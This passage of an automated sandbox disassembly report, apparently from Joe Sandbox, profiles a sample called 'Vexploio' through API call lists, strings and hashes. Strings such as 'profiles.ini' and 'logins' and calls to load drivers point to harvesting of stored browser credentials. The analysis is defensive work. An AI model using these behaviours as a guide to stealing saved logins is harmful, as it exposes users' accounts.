                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                              • String ID: :stringdata$ftp://$http://$https://
                              • API String ID: 2787044678-1921111777
                              • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                              • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                              • GetWindowRect.USER32(?,?), ref: 00414088
                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                              • GetDC.USER32 ref: 004140E3
                              • wcslen.MSVCRT ref: 00414123
                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                              • ReleaseDC.USER32(?,?), ref: 00414181
                              • _snwprintf.MSVCRT ref: 00414244
                              • SetWindowTextW.USER32(?,?), ref: 00414258
                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                              • GetClientRect.USER32(?,?), ref: 004142E1
                              • GetWindowRect.USER32(?,?), ref: 004142EB
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                              • GetClientRect.USER32(?,?), ref: 0041433B
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                              • String ID: %s:$EDIT$STATIC
                              • API String ID: 2080319088-3046471546
                              • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                              • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                              APIs
                              • EndDialog.USER32(?,?), ref: 00413221
                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                              • memset.MSVCRT ref: 00413292
                              • memset.MSVCRT ref: 004132B4
                              • memset.MSVCRT ref: 004132CD
                              • memset.MSVCRT ref: 004132E1
                              • memset.MSVCRT ref: 004132FB
                              • memset.MSVCRT ref: 00413310
                              • GetCurrentProcess.KERNEL32 ref: 00413318
                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                              • memset.MSVCRT ref: 004133C0
                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                              • memcpy.MSVCRT ref: 004133FC
                              • wcscpy.MSVCRT ref: 0041341F
                              • _snwprintf.MSVCRT ref: 0041348E
                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                              • SetFocus.USER32(00000000), ref: 004134B7
                              Strings
                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                              • {Unknown}, xrefs: 004132A6
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                              • API String ID: 4111938811-1819279800
                              • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                              • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                              APIs
                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                              • EndDialog.USER32(?,?), ref: 0040135E
                              • DeleteObject.GDI32(?), ref: 0040136A
                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                              • ShowWindow.USER32(00000000), ref: 00401398
                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                              • ShowWindow.USER32(00000000), ref: 004013A7
                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                              • String ID:
                              • API String ID: 829165378-0
                              • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                              • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                              APIs
                              • memset.MSVCRT ref: 00404172
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                              • wcscpy.MSVCRT ref: 004041D6
                              • wcscpy.MSVCRT ref: 004041E7
                              • memset.MSVCRT ref: 00404200
                              • memset.MSVCRT ref: 00404215
                              • _snwprintf.MSVCRT ref: 0040422F
                              • wcscpy.MSVCRT ref: 00404242
                              • memset.MSVCRT ref: 0040426E
                              • memset.MSVCRT ref: 004042CD
                              • memset.MSVCRT ref: 004042E2
                              • _snwprintf.MSVCRT ref: 004042FE
                              • wcscpy.MSVCRT ref: 00404311
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                              • API String ID: 2454223109-1580313836
                              • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                              • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                              APIs
                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                              • SetMenu.USER32(?,00000000), ref: 00411453
                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                              • memcpy.MSVCRT ref: 004115C8
                              • ShowWindow.USER32(?,?), ref: 004115FE
                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                              • API String ID: 4054529287-3175352466
                              • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                              • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcscat$_snwprintfmemset$wcscpy
                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                              • API String ID: 3143752011-1996832678
                              • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                              • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AddressProc$HandleModule
                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                              • API String ID: 667068680-2887671607
                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _snwprintfmemset$wcscpy$wcscat
                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                              • API String ID: 1607361635-601624466
                              • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                              • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _snwprintf$memset$wcscpy
                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                              • API String ID: 2000436516-3842416460
                              • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                              • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                              APIs
                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                              • String ID:
                              • API String ID: 1043902810-0
                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@??3@_snwprintfwcscpy
                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                              • API String ID: 2899246560-1542517562
                              • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                              • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                              APIs
                              • memset.MSVCRT ref: 0040DBCD
                              • memset.MSVCRT ref: 0040DBE9
                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                              • wcscpy.MSVCRT ref: 0040DC2D
                              • wcscpy.MSVCRT ref: 0040DC3C
                              • wcscpy.MSVCRT ref: 0040DC4C
                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                              • wcscpy.MSVCRT ref: 0040DCC3
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                              • API String ID: 3330709923-517860148
                              • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                              • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                              APIs
                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                              • memset.MSVCRT ref: 0040806A
                              • memset.MSVCRT ref: 0040807F
                              • _wtoi.MSVCRT ref: 004081AF
                              • _wcsicmp.MSVCRT ref: 004081C3
                              • memset.MSVCRT ref: 004081E4
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                              • String ID: logins$null
                              • API String ID: 3492182834-2163367763
                              • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                              • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                              APIs
                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                              • memset.MSVCRT ref: 004085CF
